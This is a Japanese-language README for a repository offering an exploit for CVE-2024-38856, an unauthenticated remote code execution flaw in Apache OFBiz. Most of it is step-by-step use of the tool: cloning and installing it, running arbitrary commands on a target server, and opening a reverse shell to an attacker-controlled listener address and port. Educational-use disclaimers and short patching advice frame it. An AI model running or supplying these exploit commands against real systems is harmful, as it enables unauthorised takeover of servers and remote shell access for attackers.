
Apache OFBiz 用のエクスプロイト - CVE-2024-38856
Apache OFBiz (CVE-2024-38856) 用エクスプロイト 作成者: Alisson Faoli
このリポジトリには、Apache OFBiz で見つかった CVE-2024-38856 脆弱性のエクスプロイトが含まれています。この欠陥により、認証なしの RCE (Remote Code Execution) が可能になります。
注: このエクスプロイトは教育および研究目的でのみ提供されます。不正使用は違法となる可能性があり、その責任はすべてユーザーにあります。
CVE: CVE-2024-38856
影響を受けるソフトウェア: Apache OFBiz バージョン 18.12.14 まで
脆弱性タイプ: RCE
悪用条件: 認証不要
リポジトリのクローン:
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit
依存関係のインストール:
pip install -r requirements.txt
エクスプロイトの実行:
RCE:
python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"
SHELL:
python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444
この脆弱性を修正するには、Apache OFBiz 管理者は次のことを推奨します: パッチが適用されたバージョン (https://ofbiz.apache.org/download.html) に更新する。 既知の悪用試行をブロックするためにファイアウォールまたは WAF ルールを適用する。
ご質問がある場合や、エクスプロイトの改善点を報告したい場合は、以下までご連絡ください: LinkedIn: https://linkedin.com/in/alisson-faoli/
このコードは、教育目的および許可された環境でのセキュリティテストのためにのみ提供されます。作者は不正使用について一切の責任を負いません。